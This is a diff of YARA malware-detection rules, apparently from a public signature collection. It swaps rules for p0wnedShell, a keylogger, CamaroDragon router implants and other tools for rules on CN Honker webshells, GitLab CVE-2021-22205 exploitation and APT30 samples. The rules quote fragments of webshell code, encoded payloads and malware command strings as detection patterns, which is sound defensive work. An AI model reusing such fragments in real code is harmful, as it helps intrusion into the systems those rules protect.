-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedBinaries.cs"
+		description = "Webshell from CN Honker Pentest Toolset - file mssql.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0c62dd3a-195c-5890-b262-2eb00c58f8c1"
-		date = "2017-01-14"
+		id = "3f9706d6-7f6e-5120-945a-d5d928d79507"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L142-L161"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1137-L1153"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4df7fcf508a9257ea418bd1995158c3676037b310dc884d44658977fda81b13b"
-		score = 75
+		hash = "ad55512afa109b205e4b1b7968a89df0cf781dc9"
+		logic_hash = "1d4b75eeeddda6e92b8ec38679d5e2b9d21abf2d2b467b91a066dcf628725f0a"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fd7014625b58d00c6e54ad0e587c6dba5d50f8ca4b0f162d5af3357c2183c7a7"
 
 	strings:
-		$x1 = "Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9" ascii
-		$x2 = "wpoWAB+LCAAAAAAABADs/QeyK7uOBYhORUNIenL+E2vBA0ympH3erY4f8Tte3TpbUiY9YRbcGK91vVKtr+tV3v/B/yr/m1vD/+DvNOVb+V/f" ascii
-		$x3 = "mo0MAB+LCAAAAAAABADsXQl24zqu3YqXII6i9r+xJ4AACU4SZcuJnVenf/9OxbHEAcRwcQGu62NbHsrax/Iw+3/hP5b+VzuH/4WfVeDf8n98" ascii
-		$x4 = "LE4CAB+LCAAAAAAABADsfQmW2zqu6Fa8BM7D/jf2hRmkKNuVm/Tt9zunkipb4giCIGb2/prhFUt5hVe+/sNP4b+pVvwPn+OQp/LT9ge/+" ascii
-		$x5 = "XpMCAB+LCAAAAAAABADsfQeWIzmO6FV0hKAn73+xL3iAwVAqq2t35r/tl53VyhCDFoQ3Y7zW9Uq1vq5Xef/CT+X/59bwFz6nKU/lp+8P/" ascii
-		$x6 = "STwAAB+LCAAAAAAABADtWwmy6yoO3YqXgJjZ/8ZaRwNgx/HNfX/o7qqUkxgzCM0SmLR2jHBQzkc4En9xZbvHUuSLMnWv9ateK/70ilStR" ascii
-		$x7 = "namespace p0wnedShell" fullword ascii
+		$s1 = "sqlpass=request(\"sqlpass\")" fullword ascii
+		$s2 = "set file=fso.createtextfile(server.mappath(request(\"filename\")),8,true)" fullword ascii
+		$s3 = "<blockquote> ServerIP:&nbsp;&nbsp;&nbsp;" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_P0Wnedamsibypass
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp1 : FILE
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedAmsiBypass.cs"
+		description = "Webshell from CN Honker Pentest Toolset - file asp1.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "168af265-d3e9-59a2-b754-20d6c9a298b1"
-		date = "2017-01-14"
+		id = "bf0b1f1e-cf7b-5afb-8e0a-bcfd70fc8887"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L163-L178"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1155-L1171"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1f7613506058706fc74979fdd4f9e425e9d16527120e0f2f49bc21e3e43d3b16"
-		score = 75
+		hash = "78b5889b363043ed8a60bed939744b4b19503552"
+		logic_hash = "3b454b1254d05b2208aee02e966c9c56a338dd3d33a2c6acc2c4df3208314055"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "345e8e6f38b2914f4533c4c16421d372d61564a4275537e674a2ac3360b19284"
 
 	strings:
-		$x1 = "Program.P0wnedPath()" fullword ascii
-		$x2 = "namespace p0wnedShell" fullword ascii
-		$x3 = "H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMVryzxIbGrt/rcFRZIa1CQYEFCQnxotUhP2pX3Q337HpYotCKrPdbmoQQnkOY0+BQCNKRpe" ascii
+		$s1 = "SItEuRl=" ascii
+		$s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
+		$s3 = "Server.ScriptTimeout=" ascii
 
 	condition:
-		1 of them
+		filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_P0Wnedshell_Outputs
+rule SIGNATURE_BASE_EXPL_Gitlab_CE_RCE_CVE_2021_22205 : CVE_2021_22205
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - from files p0wnedShell.cs, p0wnedShell.cs"
+		description = "Detects signs of exploitation of GitLab CE CVE-2021-22205"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c19fc14b-0c42-5dd1-bff2-ba75f4168d9c"
-		date = "2017-01-14"
+		id = "21cc6fa7-e50d-5b8e-815d-27315ab5635d"
+		date = "2021-10-26"
 		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L180-L196"
+		reference = "https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_gitlab_cve_2021_22205.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "85d5317a473d981fe6ee1362789f34653a838c63d823bb62028a25c9db27cf6e"
-		score = 75
+		logic_hash = "54b841716a6bd56706c1c38fcda9a27ffd7feba2660602b191e8e347983e578d"
+		score = 70
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60"
+		tags = "CVE-2021-22205"
 
 	strings:
-		$s1 = "[+] For this attack to succeed, you need to have Admin privileges." fullword ascii
-		$s2 = "[+] This is not a valid hostname, please try again" fullword ascii
-		$s3 = "[+] First return the name of our current domain." fullword ascii
+		$sa1 = "VXNlci5maW5kX2J5KHVzZXJuYW1l" ascii
+		$sa2 = "VzZXIuZmluZF9ieSh1c2VybmFtZ" ascii
+		$sa3 = "Vc2VyLmZpbmRfYnkodXNlcm5hbW" ascii
+		$sb1 = "dXNlci5hZG1pb" ascii
+		$sb2 = "VzZXIuYWRtaW" ascii
+		$sb3 = "1c2VyLmFkbWlu" ascii
+		$sc1 = "dXNlci5zYXZlI" ascii
+		$sc2 = "VzZXIuc2F2ZS" ascii
+		$sc3 = "1c2VyLnNhdmUh" ascii
 
 	condition:
-		1 of them
+		1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* )
 }
-rule SIGNATURE_BASE_Keylogger_CN_APT : FILE
+rule SIGNATURE_BASE_EXPL_Gitlab_CE_RCE_Malformed_JPG_CVE_2021_22204 : CVE_2021_22204 CVE_2021_22205 FILE
 {
 	meta:
-		description = "Keylogger - generic rule for a Chinese variant"
+		description = "Detects malformed JPG files exploting EXIF vulnerability CVE-2021-22204 and used in the exploitation of GitLab vulnerability CVE-2021-22205"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7be0b175-05a4-5725-ba21-9438c0fcd740"
-		date = "2016-03-07"
+		id = "3d769340-0306-596d-8783-2b37b93a5673"
+		date = "2021-10-26"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_keylogger_cn.yar#L8-L35"
+		reference = "https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=blog"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_gitlab_cve_2021_22205.yar#L29-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3efb3b5be39489f19d83af869f11a8ef8e9a09c3c7c0ad84da31fc45afcf06e7"
-		logic_hash = "a5330d15ad7199212cec44ade401c224c40a468650abbc7bf282b26a21cdc22b"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "0718ad24337acbb746c6e0d7e0b42d2d034ff583ec6fd12b34fda4737d7e78b0"
+		score = 70
+		quality = 58
+		tags = "CVE-2021-22204, CVE-2021-22205, FILE"
 
 	strings:
-		$x1 = "Mozilla/4.0 (compatible; MSIE6.0;Windows NT 5.1)" fullword ascii
-		$x2 = "attrib -s -h -r c:\\ntldr" fullword ascii
-		$x3 = "%sWindows NT %d.%d" fullword ascii
-		$x4 = "Referer: http://%s/%s.aspx?n=" fullword ascii
-		$s1 = "\\cmd.exe /c \"systeminfo.exe >> " fullword ascii
-		$s2 = "%s\\cmd.exe /c %s >> \"%s\"" fullword ascii
-		$s3 = "shutdown.exe -r -t 0" fullword ascii
-		$s4 = "dir \"%SystemDrive%\\\" /s /a" fullword ascii
-		$s5 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;" fullword ascii
-		$s6 = "http_s.exe" fullword ascii
-		$s7 = "User Agent\\Post Platform\\" ascii
-		$s8 = "desktop.tmp" fullword ascii
-		$s9 = "\\support.icw" ascii
-		$s10 = "agc.tmp" fullword ascii
+		$h1 = { 41 54 26 54 46 4F 52 4D }
+		$sr1 = /\(metadata[\s]{0,3}\([A-Za-z]{1,20} "\\/
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of ( $x* ) ) or 3 of them
+		filesize < 10KB and $h1 and $sr1
 }
-rule SIGNATURE_BASE_MAL_Gozicrypter_Dec20_1 : FILE
+rule SIGNATURE_BASE_APT30_Generic_H : FILE
 {
 	meta:
-		description = "Detects crypter associated with several Gozi samples"
-		author = "James Quinn"
-		id = "d4a48612-fa6f-5f03-8d27-5f6b79b2a070"
-		date = "2020-12-02"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1908e985-9634-51dc-8972-53afa13c26a3"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "YaraExchange"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_gozi_crypter.yar#L2-L13"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L10-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "51fdfbb59b8f52cc2ff89d994c0f89d2c2895c346b098879c68b4ccb880783c1"
-		score = 70
+		logic_hash = "e4affe7dc01efc4d6c25aaae4679bc1f8fddd97794e351d30501eaeb8e1d1dea"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2a4c8752f3e7fde0139421b8d5713b29c720685d"
+		hash2 = "4350e906d590dca5fcc90ed3215467524e0a4e3d"
 
 	strings:
-		$s1 = { 89 05 ?? ?? ?? ?? 81 2d ?? ?? ?? ?? 01 00 00 00 81 3D ?? ?? ?? ?? 00 00 00 00 }
+		$s0 = "\\Temp1020.txt" ascii
+		$s1 = "Xmd.Txe" fullword ascii
+		$s2 = "\\Internet Exp1orer" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them and filesize < 1000KB
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Gifcloaked_Webshell_A : FILE
+rule SIGNATURE_BASE_APT30_Sample_2 : FILE
 {
 	meta:
-		description = "Looks like a webshell cloaked as GIF"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4fdef65c-204a-5019-9b4f-c5877c3e39d4"
-		date = "2018-03-12"
-		modified = "2026-02-04"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/yara_mixed_ext_vars.yar#L176-L197"
+		id = "821a2de9-48c4-58d8-acc4-1e25025ab5cf"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
-		logic_hash = "0c4570373d50c40745cd0523dcf8c34ee3cae1c298982b3a39d4a33e054aa779"
-		score = 60
+		hash = "0359ffbef6a752ee1a54447b26e272f4a5a35167"
+		logic_hash = "e34dbb90fc868b0619d3d2aa1b6176252836a6ae72e6f52b1eba632054f7c272"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "input type"
-		$s1 = "<%eval request"
-		$s2 = "<%eval(Request.Item["
-		$s3 = "LANGUAGE='VBScript'"
-		$s4 = "$_REQUEST" fullword
-		$s5 = ";eval("
-		$s6 = "base64_decode"
-		$fp1 = "<form name=\"social_form\""
+		$s0 = "ForZRLnkWordDlg.EXE" fullword wide
+		$s1 = "ForZRLnkWordDlg Microsoft " fullword wide
+		$s9 = "ForZRLnkWordDlg 1.0 " fullword wide
+		$s11 = "ForZRLnkWordDlg" fullword wide
+		$s12 = " (C) 2011" fullword wide
 
 	condition:
-		uint32( 0 ) == 0x38464947 and ( 1 of ( $s* ) ) and not 1 of ( $fp* )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_SUSP_ELF_SPARC_Hunting_SBZ_Obfuscation : FILE
+rule SIGNATURE_BASE_APT30_Sample_3 : FILE
 {
 	meta:
-		description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
-		author = "netadr, modified by Florian Roth to avoid elf module import"
-		id = "15ee9a66-d823-508c-a14c-2c6ff45f47e5"
-		date = "2023-04-02"
-		modified = "2023-05-08"
-		reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_sparc_sbz_apr23.yar#L2-L24"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "62e81385-26f5-545d-92ff-6604ff4d0186"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L47-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3d45dc8d8dbc62cee6b7ec4aa842eaa88bd23aea17e995eef4850fd91e7069a3"
-		score = 60
+		hash = "d0320144e65c9af0052f8dee0419e8deed91b61b"
+		logic_hash = "ee61ec1fdf27fa21bcc235fce0ab8dc74968b39a747648ce828fb4826cf1d234"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xor_block = { 9A 18 E0 47 9A 1B 40 01 9A 18 80 0D }
-		$a1 = "SUNW_"
+		$s5 = "Software\\Mic" ascii
+		$s6 = "HHOSTR" ascii
+		$s9 = "ThEugh" fullword ascii
+		$s10 = "Moziea/" ascii
+		$s12 = "%s%s(X-" ascii
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and $a1 and $xor_block
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_SUSP_ELF_SPARC_Hunting_SBZ_Uniquestrings
+rule SIGNATURE_BASE_APT30_Generic_C : FILE
 {
 	meta:
-		description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
-		author = "netadr, modified by Florian Roth for performance reasons"
-		id = "d2f70d10-412e-5e83-ba4f-eac251012dc1"
-		date = "2023-04-02"
-		modified = "2023-05-08"
-		reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_sparc_sbz_apr23.yar#L26-L47"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "25ec8d54-9875-5bf5-abc9-296f18f3c5e5"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L66-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bb95fc6bda0a0ed8ffc6db9734c725c487b0e70909d60119bf58d60987daaaeb"
-		score = 60
+		logic_hash = "b969565eac3b6f548318aae4edc8d8851f522a6c263bcaf2a466ff0ca9af78a4"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8667f635fe089c5e2c666b3fe22eaf3ff8590a69"
+		hash2 = "0c4fcef3b583d0ffffc2b14b9297d3a4"
+		hash3 = "37aee58655f5859e60ece6b249107b87"
+		hash4 = "4154548e1f8e9e7eb39d48a4cd75bcd1"
+		hash5 = "a2e0203e665976a13cdffb4416917250"
+		hash6 = "b4ae0004094b37a40978ef06f311a75e"
+		hash7 = "e39756bc99ee1b05e5ee92a1cdd5faf4"
 
 	strings:
-		$s1 = "<%u>[%s] Event #%u: "
-		$s2 = "lprc:%08X" ascii fullword
-		$s3 = "diuXxobB"
-		$s4 = "CHM_FW"
+		$s0 = "MYUSER32.dll" fullword ascii
+		$s1 = "MYADVAPI32.dll" fullword ascii
+		$s2 = "MYWSOCK32.dll" fullword ascii
+		$s3 = "MYMSVCRT.dll" fullword ascii
 
 	condition:
-		2 of ( $* )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_SUSP_ELF_SPARC_Hunting_SBZ_Modulestruct : FILE
+rule SIGNATURE_BASE_APT30_Sample_4 : FILE
 {
 	meta:
-		description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
-		author = "netadr, modified by Florian Roth for FP reduction reasons"
-		id = "909746f1-44f5-597b-bdb2-2a1396d4b8c7"
-		date = "2023-04-02"
-		modified = "2023-05-08"
-		reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_sparc_sbz_apr23.yar#L49-L65"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5c6afde-0ab5-54ed-8d18-5ad477a527d7"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L90-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dc9608c769dcb14ba01559bfe2e8ed03eebf5695b867b53742f26e3fcce389ca"
-		score = 60
+		hash = "75367d8b506031df5923c2d8d7f1b9f643a123cd"
+		logic_hash = "ec9542acb583bd5812d561bea70e89e0fcddc1eaef14d3ea5b8ad29711ed17ae"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$be = { 02 02 00 00 01 C1 00 07 }
-		$le = { 02 02 00 00 07 00 C1 01 }
+		$s0 = "GetStartupIn" ascii
+		$s1 = "enMutex" ascii
+		$s2 = "tpsvimi" ascii
+		$s3 = "reateProcesy" ascii
+		$s5 = "FreeLibr1y*S" ascii
+		$s6 = "foAModuleHand" ascii
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and ( $be or $le )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_SUSP_Email_Redirection_Spoofing_Feb25
+rule SIGNATURE_BASE_APT30_Sample_5 : FILE
 {
 	meta:
-		description = "Detects redirect spoofing in embedded URLs. This technique is used by threat actors to obscure the actual destination of a link"
-		author = "Jonathan Peters (cod3nym)"
-		id = "bf3a2b06-4dc5-5f0f-bf1f-2bd6a1cc4a8d"
-		date = "2025-02-20"
-		modified = "2025-03-20"
-		reference = "https://any.run/cybersecurity-blog/cyber-attacks-january-2025/#fake-youtube-links-redirect-users-to-phishing-pages-11298"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_email_redirection_spoofing.yar#L1-L19"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bdbebe44-7423-5793-8a42-4f9b70de2231"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L110-L127"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9b196220b369c199a7e4d57cb5db18b32eb2565a6f9190929c5c01ac4fa04ac8"
-		hash = "c4eb35c1a1c10226bff9bb0c88ca516441208d193b4994eeb292a66e53a2cc04"
-		hash = "e3b8ea03a472348814c6ac81088234836e627a1878ec36e46ce62526e1390935"
-		logic_hash = "9a411317821751dc0873fe3163791115d1e19bc4d57119ed2ba513b444864032"
-		score = 70
+		hash = "1a2dd2a0555dc746333e7c956c58f7c4cdbabd4b"
+		logic_hash = "3738076d97bf19404bad20c2419eae83dd2b65400d5bd135ffe73362c008de9b"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "Content-Transfer-Encoding:" ascii
-		$sa2 = "Subject:" ascii
-		$x = ".com%20%20%20%20%20%" ascii
+		$s0 = "Version 4.7.3001" fullword wide
+		$s1 = "Copyright (c) Microsoft Corporation 2004" fullword wide
+		$s3 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the U" wide
+		$s7 = "msmsgs" fullword wide
+		$s10 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
 
 	condition:
-		all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_LNX_Camarodragon_Sheel_Oct23 : FILE
+rule SIGNATURE_BASE_APT30_Sample_6 : FILE
 {
 	meta:
-		description = "Detects CamaroDragon's tool named sheel"
-		author = "Florian Roth"
-		id = "f6f08c0e-236c-5194-9369-da8fdef4aa21"
-		date = "2023-10-06"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2f19809c-09fc-51bf-9a20-6b95099a92dd"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_camaro_dragon_oct23.yar#L2-L25"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L129-L143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b06f645b766a099adb71c144bdced70c130735e75d5be6451f71077c7d3a5d19"
-		score = 85
+		hash = "00e69b059ad6b51b76bc476a115325449d10b4c0"
+		logic_hash = "139719139056f575967629f0153e0a05239bc26f61f6d4324cfb6a816518c3df"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7985f992dcc6fcce76ee2892700c8538af075bd991625156bf2482dbfebd5a5a"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "-h server_ip -p server_port -i update_index[0-4] [-r]" ascii fullword
-		$s1 = "read_ip" ascii fullword
-		$s2 = "open fail.%m" ascii fullword
-		$s3 = "ri:h:p:" ascii fullword
-		$s4 = "update server list success!" ascii fullword
+		$s0 = "GreateProcessA" fullword ascii
+		$s1 = "Ternel32.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 30KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_LNX_Camarodragon_Horseshell_Oct23 : FILE
+rule SIGNATURE_BASE_APT30_Sample_7 : FILE
 {
 	meta:
-		description = "Detects CamaroDragon's HorseShell implant for routers"
-		author = "Florian Roth"
-		id = "9e54745f-146f-50a6-b30f-53aaaa6907b5"
-		date = "2023-10-06"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "612732d9-8df5-5388-b299-2da4f8118435"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_camaro_dragon_oct23.yar#L27-L56"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L145-L163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "73adaa286b345cffd35e6ba017b3204d8818dcaeea8a48ca93959566461ac3ca"
-		score = 85
+		hash = "868d1f4c106a08bd2e5af4f23139f0e0cd798fba"
+		logic_hash = "f7922d795bc92714a9ef4861bc9c4ac9921a73749e3aa1d5f7dbc3c991fe7145"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "998788472cb1502c03675a15a9f09b12f3877a5aeb687f891458a414b8e0d66c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "echo \"start shell '%s' failed!\" > .remote_shell.log" ascii fullword
-		$x2 = "*****recv NET_REQ_HORSE_SHELL REQ_CONNECT_PORT*****" ascii fullword
-		$s1 = "m.cremessage.com" ascii fullword
-		$s2 = "POST http://%s/index.php HTTP/1.1" ascii fullword
-		$s3 = "wzsw_encrypt_buf" ascii fullword
-		$s4 = "body:%d-%s" ascii fullword
-		$s5 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident" ascii fullword
-		$s6 = "process_http_read_events" ascii fullword
-		$op1 = { c4 34 42 00 02 30 63 00 40 10 60 00 09 ae 62 00 48 8e 62 00 cc }
-		$op2 = { 27 f4 8c 46 27 f0 03 20 f8 09 00 60 28 21 }
+		$s0 = "datain" fullword ascii
+		$s3 = "C:\\Prog" ascii
+		$s4 = "$LDDATA$" ascii
+		$s5 = "Maybe a Encrypted Flash" fullword ascii
+		$s6 = "Jean-loup Gailly" ascii
